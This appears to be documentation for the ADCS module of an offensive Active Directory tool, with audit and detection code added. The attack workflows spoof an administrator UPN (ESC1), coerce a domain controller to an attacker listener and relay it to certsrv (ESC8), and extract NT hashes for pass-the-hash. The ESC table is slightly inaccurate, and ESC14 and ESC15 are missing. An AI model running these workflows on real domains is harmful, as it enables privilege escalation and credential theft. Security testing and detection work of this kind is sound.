adcs

The adcs command provides tooling for enumerating, analyzing, and exploiting Active Directory Certificate Services (ADCS). It covers certificate authority enumeration, vulnerability detection across ESC1–ESC16, certificate requests, NT hash extraction via PKINIT, and relay attack enumeration.

Usage

r4t adcs <subcommand> [flags]

Subcommands

adcs find

Enumerate the full ADCS environment and detect vulnerabilities. This is typically the first ADCS command you run — it enumerates all certificate authorities and certificate templates, then evaluates them for known escalation scenarios (ESC1–ESC16).
r4t adcs find

# Specify LDAP server and output directory
r4t adcs find --ldap-server 10.10.10.10 --output ./adcs-results/

Flags

Flag              Description
--output, -o      Directory to write enumeration results
--ldap-server     LDAP server (defaults to stored target)

What It Detects

ESC      Description
ESC1     Template allows client-supplied Subject Alternative Names with enrollment rights to low-privileged users
ESC2     Template has the Any Purpose or SubCA EKU with enrollment rights to low-privileged users
ESC3     Template allows enrollment agent enrollment (Certificate Request Agent)
ESC4     Template has a vulnerable DACL that allows low-privileged users to modify the template
ESC5     Vulnerable PKI object DACL (CA, AIA, CDP, NTAuthCertificates)
ESC6     CA has EDITF_ATTRIBUTESUBJECTALTNAME2 flag set
ESC7     CA has dangerous permissions for unprivileged users
ESC8     CA web enrollment is accessible and allows NTLM relay
ESC9     Template has CT_FLAG_NO_SECURITY_EXTENSION set, so issued certificates carry no security extension
ESC10    Weak certificate mapping configuration on the target domain
ESC11    CA has IF_ENFORCEENCRYPTICERTREQUEST flag not set
ESC12    CA Shell access via EDITF_ATTRIBUTEALTNAME2
ESC13    Issuance policy linked to a group enables privilege escalation
ESC16    CA does not enforce strong certificate binding

Results are stored in the certificate_authorities, certificate_templates, and adcs_vulnerabilities tables.
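The checks behind the template-side and CA-side rows above reduce to a handful of flag and EKU tests. The following is an added audit example, not r4t's own code: it evaluates constructed template and CA records for the ESC1, ESC2, ESC3, ESC6 and ESC11 conditions so you can see exactly which attribute makes a template land in adcs_vulnerabilities. The dict layouts, the record names and the sample SIDs are assumptions; the flag constants and EKU OIDs are the documented MS-CRTD / CA registry values.

```python
"""Evaluate ADCS template and CA settings for the ESC1, ESC2, ESC3, ESC6 and
ESC11 conditions.  Added audit example, not r4t's own code; the dict layouts
are an assumption about what an enumeration pass collects from LDAP
(templates) and the CA registry (EditFlags, InterfaceFlags)."""

from typing import Dict, List

# msPKI-Certificate-Name-Flag / msPKI-Enrollment-Flag bits (MS-CRTD).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # requester chooses subject/SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # CA manager approval required

# CA registry bits: policy\EditFlags and ca\InterfaceFlags.
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000      # SAN accepted from request attributes
IF_ENFORCEENCRYPTICERTREQUEST = 0x00000200       # encrypted RPC enrollment enforced

# EKUs that make an issued certificate usable for domain authentication.
ANY_PURPOSE = "2.5.29.37.0"
CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    ANY_PURPOSE,
}

# "Low-privileged" principals: well-known SIDs plus the domain RIDs for
# Domain Users (513) and Domain Computers (515).
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11"}          # Everyone, Authenticated Users
LOW_PRIV_RIDS = {"513", "515"}


def is_low_priv(sid: str) -> bool:
    return sid in LOW_PRIV_SIDS or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS


def audit_template(t: Dict) -> List[str]:
    """Return the ESC labels a single template record triggers."""
    findings: List[str] = []
    if not any(is_low_priv(sid) for sid in t["enroll_sids"]):
        return findings                      # only privileged principals can enrol
    if t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS or t["ra_signatures"] > 0:
        return findings                      # gated by approval or agent signature
    ekus = set(t["ekus"])
    any_purpose = ANY_PURPOSE in ekus or not ekus   # empty EKU list = usable for anything
    if t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT and (ekus & AUTH_EKUS or not ekus):
        findings.append("ESC1")
    if any_purpose:
        findings.append("ESC2")
    if CERT_REQUEST_AGENT in ekus:
        findings.append("ESC3")
    return findings


def audit_ca(ca: Dict) -> List[str]:
    """Return the ESC labels a CA configuration record triggers."""
    findings: List[str] = []
    if ca["edit_flags"] & EDITF_ATTRIBUTESUBJECTALTNAME2:
        findings.append("ESC6")
    if not ca["interface_flags"] & IF_ENFORCEENCRYPTICERTREQUEST:
        findings.append("ESC11")
    return findings


# Constructed records, not from a real domain.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE_TEMPLATES = [
    {"name": "User", "name_flag": 0xA6000000, "enrollment_flag": 0x29, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4", "1.3.6.1.5.5.7.3.4"],
     "enroll_sids": [f"{DOMAIN_SID}-513"]},                      # stock User template
    {"name": "VulnerableTemplate", "name_flag": 0x1, "enrollment_flag": 0x0, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll_sids": [f"{DOMAIN_SID}-513"]},
    {"name": "SubCA", "name_flag": 0x1, "enrollment_flag": 0x0, "ra_signatures": 0,
     "ekus": [], "enroll_sids": [f"{DOMAIN_SID}-512"]},          # Domain Admins only
    {"name": "PendingSAN", "name_flag": 0x1, "enrollment_flag": 0x2, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll_sids": ["S-1-5-11"]},  # manager approval gates it
]
SAMPLE_CA = {"name": "corp-CA", "edit_flags": 0x15014E, "interface_flags": 0x441}


def run_audit() -> Dict[str, List[str]]:
    """Map each object name to its findings; an empty list means nothing hit."""
    results = {t["name"]: audit_template(t) for t in SAMPLE_TEMPLATES}
    results[SAMPLE_CA["name"]] = audit_ca(SAMPLE_CA)
    return results


if __name__ == "__main__":
    for name, findings in run_audit().items():
        print(f"{name:20} {', '.join(findings) or 'clean'}")
```

Note the two early returns in audit_template: a template that lets the enrollee supply its own subject is only a finding when a low-privileged principal can enrol and neither manager approval nor an authorized signature stands in the way, which is why the stock User template and the approval-gated PendingSAN record come back clean while VulnerableTemplate does not.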

adcs req

Request or retrieve certificates from a Certificate Authority.
# Request a certificate from a template
r4t adcs req --ca "corp-CA" --target dc01.corp.example.com --template "User" \
  --upn administrator@corp.example.com --out /tmp/admin.pfx

# Retrieve a pending certificate by request ID
r4t adcs req --ca "corp-CA" --target dc01.corp.example.com --retrieve --request-id 42

# ESC1 exploitation — supply an arbitrary SAN UPN
r4t adcs req --ca "corp-CA" --target dc01.corp.example.com \
  --template "VulnerableTemplate" --upn administrator@corp.example.com \
  --out /tmp/admin.pfx

# Include DNS SAN
r4t adcs req --ca "corp-CA" --target dc01.corp.example.com \
  --template "User" --dns "dc01.corp.example.com" --out /tmp/dc01.pfx

# Output as PEM instead of PFX
r4t adcs req --ca "corp-CA" --target dc01.corp.example.com \
  --template "User" --out /tmp/user.pem --pem

Flags

Flag              Description
--ca              Certificate Authority name (required)
--target          Target CA server hostname/IP (required)
--template        Certificate template name
--subject         Certificate subject (e.g., CN=user)
--upn             User Principal Name for Subject Alternative Name
--dns             DNS SAN (repeatable, e.g., --dns host1 --dns host2)
--email           Email SAN
--ip              IP SAN (repeatable)
--attributes      Additional request attributes
--key-size        RSA key size in bits (default: 2048)
--key-file        Use an existing private key
--method          Request method: rpc, dcom, or web (default: rpc)
--retrieve        Retrieve a pending or already-issued certificate
--request-id      Request ID to retrieve
--out, -o         Output file path for the certificate
--pem             Output in PEM format instead of PFX
--no-key          Don't include private key in output

adcs nt

Extract the NT hash of an account using PKINIT + UnPAC-the-Hash. When you have a valid certificate for an account (e.g., obtained via adcs req), you can authenticate via Kerberos PKINIT to get a TGT, then extract the NT hash from the PAC field. This allows lateral movement with Pass-the-Hash even when you only have a certificate.
# Using PFX certificate (loaded from stored credential or inline)
r4t adcs nt --pfx /tmp/admin.pfx

# Override UPN (when the certificate UPN differs from the target)
r4t adcs nt --pfx /tmp/admin.pfx --upn administrator@corp.example.com

Flags

Flag              Description
--upn             Override UPN for authentication
Authentication flags (--pfx, --pfx-password, --cert, --key, --ccache) are inherited from the global flags or stored credential.

adcs relay

Enumerate and support ADCS relay attacks (ESC8).
r4t adcs relay
ESC8 involves relaying NTLM authentication to the CA web enrollment endpoint (/certsrv/certfnsh.asp) to request a certificate on behalf of the coerced machine account. R4t’s relay subcommand provides enumeration support for identifying relay targets.

adcs auth (planned)

Authenticate using certificates (PKINIT or Schannel). Not yet fully implemented.

adcs account (planned)

Manage Active Directory accounts via ADCS. Not yet implemented.

adcs ca (planned)

Manage Certificate Authorities (view, configure). Not yet implemented.

adcs cert (planned)

Certificate format conversion utilities (PFX ↔ PEM, extract private key, etc.). Not yet implemented.

adcs forge (planned)

Forge certificates — Golden Certificate attacks using the stolen CA private key. Not yet implemented.

adcs shadow (planned)

Shadow Credentials — manipulate msDS-KeyCredentialLink on target objects for certificate-based authentication without a template. Not yet implemented as a standalone subcommand (shadow credential detection is available via ldap scan).

adcs template (planned)

Manage certificate templates (create, modify, delete). Not yet implemented.

adcs parse (planned)

Parse certificate templates from offline LDAP output files. Not yet implemented.

Common ADCS Attack Workflows

ESC1 — Client-Supplied SAN

# 1. Find vulnerable template
r4t adcs find

# 2. Request certificate with arbitrary UPN
r4t adcs req --ca "corp-CA" --target dc01.corp.example.com \
  --template "VulnerableTemplate" --upn administrator@corp.example.com \
  --out /tmp/admin.pfx

# 3. Extract NT hash via PKINIT
r4t adcs nt --pfx /tmp/admin.pfx

# 4. Or get a TGT directly
r4t krb tgt --pfx /tmp/admin.pfx
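Step 2 of this workflow leaves a distinctive trace on the CA side: a certificate whose Subject Alternative Name carries a principal other than the account that submitted the request. The following is an added detection example, not r4t's own code, that walks an issued-certificate export and flags exactly that mismatch. The IssuedCert layout is an assumption modelled on the requester and SAN fields a CA database export or an approval event exposes; the records, accounts and the svc-enroll agent name are constructed, using the hostnames from the commands above.

```python
"""Flag issued certificates whose SAN names a principal other than the
requester.  Added detection example, not r4t's own code; the record layout is
an assumption modelled on the Requester / SAN fields of a CA database export."""

from dataclasses import dataclass
from typing import FrozenSet, List, Optional, Tuple


@dataclass
class IssuedCert:
    request_id: int
    requester: str            # DOMAIN\sAMAccountName that submitted the request
    template: str
    san_upn: Optional[str]    # otherName UPN in the SAN, if any
    san_dns: Optional[str]    # dNSName in the SAN, if any


def sam_from_requester(requester: str) -> str:
    """Strip the DOMAIN\\ prefix and normalise case."""
    return requester.split("\\", 1)[-1].lower()


def expected_names(sam: str, domain: str) -> Tuple[str, Optional[str]]:
    """UPN and DNS name the requester itself is entitled to: machine accounts
    (trailing '$') own a host DNS name, user accounts own no DNS name at all."""
    if sam.endswith("$"):
        host = sam[:-1]
        return f"{host}$@{domain}", f"{host}.{domain}"
    return f"{sam}@{domain}", None


def find_san_mismatches(records: List[IssuedCert], domain: str,
                        agents: FrozenSet[str] = frozenset()) -> List[Tuple[int, str]]:
    """Return (request_id, reason) for every certificate whose SAN does not
    belong to its requester.  Known enrollment agents are skipped because they
    legitimately request on behalf of other users (the ESC3 case)."""
    alerts: List[Tuple[int, str]] = []
    for r in records:
        sam = sam_from_requester(r.requester)
        if sam in agents:
            continue
        upn, dns = expected_names(sam, domain)
        if r.san_upn and r.san_upn.lower() != upn:
            alerts.append((r.request_id,
                           f"UPN SAN {r.san_upn} on template {r.template} issued to {r.requester}"))
        if r.san_dns and r.san_dns.lower() != dns:
            alerts.append((r.request_id,
                           f"DNS SAN {r.san_dns} on template {r.template} issued to {r.requester}"))
    return alerts


# Constructed sample export; accounts and hostnames follow the commands above.
SAMPLE_RECORDS = [
    IssuedCert(40, "CORP\\jdoe", "User", "jdoe@corp.example.com", None),
    IssuedCert(41, "CORP\\DC01$", "Machine", None, "dc01.corp.example.com"),
    IssuedCert(42, "CORP\\jdoe", "VulnerableTemplate", "administrator@corp.example.com", None),
    IssuedCert(43, "CORP\\jdoe", "User", None, "dc01.corp.example.com"),
    IssuedCert(44, "CORP\\svc-enroll", "User", "mwhite@corp.example.com", None),
]
KNOWN_AGENTS = frozenset({"svc-enroll"})   # constructed enrollment agent account


def run_detection() -> List[int]:
    """Request IDs in the sample export that warrant review."""
    alerts = find_san_mismatches(SAMPLE_RECORDS, "corp.example.com", agents=KNOWN_AGENTS)
    return [request_id for request_id, _ in alerts]


if __name__ == "__main__":
    for request_id, reason in find_san_mismatches(SAMPLE_RECORDS, "corp.example.com",
                                                  agents=KNOWN_AGENTS):
        print(f"request {request_id}: {reason}")
```

Request 42 is the ESC1 case from the workflow (a user account obtaining a certificate for administrator); request 43 shows the DNS-SAN variant, where a user account obtains a certificate carrying a domain controller's hostname. Request 44 is skipped only because the requester is on the agent allowlist, so keep that list short and tied to the accounts actually holding Certificate Request Agent certificates.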

ESC8 — NTLM Relay to Web Enrollment

# 1. Identify ESC8 using adcs find
r4t adcs find

# 2. Coerce a machine account to authenticate
r4t coerce petitpotam --listener <attacker-ip> dc01.corp.example.com

# 3. Relay authentication to CA web enrollment (external relay tool)
# ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp --adcs --template "Machine"

# 4. Use resulting certificate
r4t adcs nt --pfx /tmp/dc01.pfx

NT Hash Extraction Chain

# Full chain: cert → PKINIT → NT hash → Pass-the-Hash
r4t adcs req --ca "corp-CA" --target dc01 --template "User" --upn admin@corp --out /tmp/admin.pfx
r4t adcs nt --pfx /tmp/admin.pfx
# Take the NT hash output and use it:
r4t creds add --username administrator --hash <extracted-hash> --domain corp.example.com
r4t creds set <id>
r4t ldap get users  # now authenticating as administrator